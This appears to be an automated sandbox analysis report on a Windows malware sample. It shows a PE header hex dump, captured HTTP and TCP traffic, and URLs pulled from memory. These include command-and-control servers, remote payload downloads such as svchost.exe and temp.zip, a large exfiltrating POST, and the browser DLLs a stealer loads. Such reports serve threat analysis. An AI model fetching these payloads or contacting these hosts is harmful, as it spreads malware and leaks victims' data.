d5 7e 52 69 63 68 20 fa d5 7e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f a4 f9 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 72 05 00 00 14 02 00 00 00 00 00 3d 49 03 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 08 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 ee 06 00 04 01 00 00 00 90 07 00 90 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 bc 3b 00 00 40 d3 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 d3 06 00 18 00 00 00 78 d3 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b5 70 05 00 00 10 00 00 00 72 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 79 01 00 00 90 05 00 00 7a 01 00 00 76 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 5d 00 00 00 10 07 00 00 0e 00 00 00 f0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 70 07 00 00 02 00 00 00 fe 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 30 02 00 00 00 80 07 00 00 04 00 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 48 00 00 00 90 07 00 00 4a 00 00 00 04 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 3b 00 00 00 e0 07 00 00 3c 00 00 00 4e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /solonichat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /40eaa63b296d256c2181f079611d421f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333
Source: global traffic	HTTP traffic detected: GET /temp.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9212820331509204User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333Content-Length: 131333Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	TCP traffic: 192.168.2.3:49801 -> 81.19.131.36:2450
Source: global traffic	TCP traffic: 192.168.2.3:49810 -> 116.202.2.169:1333

Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.2.169:1333/
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.2.169:1333/40eaa63b296d256c2181f079611d421f
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.2.169:1333/T
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.2.169:1333/al
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.2.169:1333/t
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://116.202.2.169:1333/temp.zip
Source: yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.0000000001582000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001581000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9
Source: yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9-k
Source: yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9g9ecOb3jd/index.php
Source: yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.php
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.php(
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.php1
Source: yaALNupJCH.exe, 00000000.00000003.945842153.000000000157A000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.945829879.000000000156A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.php9
Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpE
Source: yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpRs
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpU
Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpVg
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpY
Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.php_
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpatch
Source: yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpespace
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpff.info5
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phph
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpion
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpkernelbase.dll
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpn
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpq
Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpspace
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phptch
Source: yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpv
Source: yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpx/svchost.exe
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.141.41.12/n9kd3X/index.phpx/svchost.exerd
Source: yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001584000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.0000000001580000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.P
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: yaALNupJCH.exe, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: yaALNupJCH.exe, 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost[1].exe.0.dr	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpPrg
Source: yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp_
Source: yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpon
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpp
Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpp8
Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/
Source: yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.php
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.php1mb3JtLXVybGVuY29kZWQ=
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.php:A
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpHb
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpNq
Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171038808.000000000155D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpOn
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpPb
Source: yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpcoded
Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpcodedRq
Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpded
Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpdq
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpk
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpodq
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phprg
Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phptc
Source: yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025833709.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025867465.0000000001573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mardukoff.info/kd3X/index.php
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exe
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exe4g
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exeV
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exeat
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exerd
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exews;
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pixcode.com.mx/svchost.exexg
Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exe
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exe3jd/index.php0c
Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exe5
Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exe8
Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exe=o
Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exeMo
Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/host.exeZ
Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://transdi.org/svchost.dll
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 12600711246403711407151220.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 12600711246403711407151220.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 51372752844971756591089692.3.dr, 40080133769305826732791000.3.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
Source: 12600711246403711407151220.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 12600711246403711407151220.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.dr	String found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
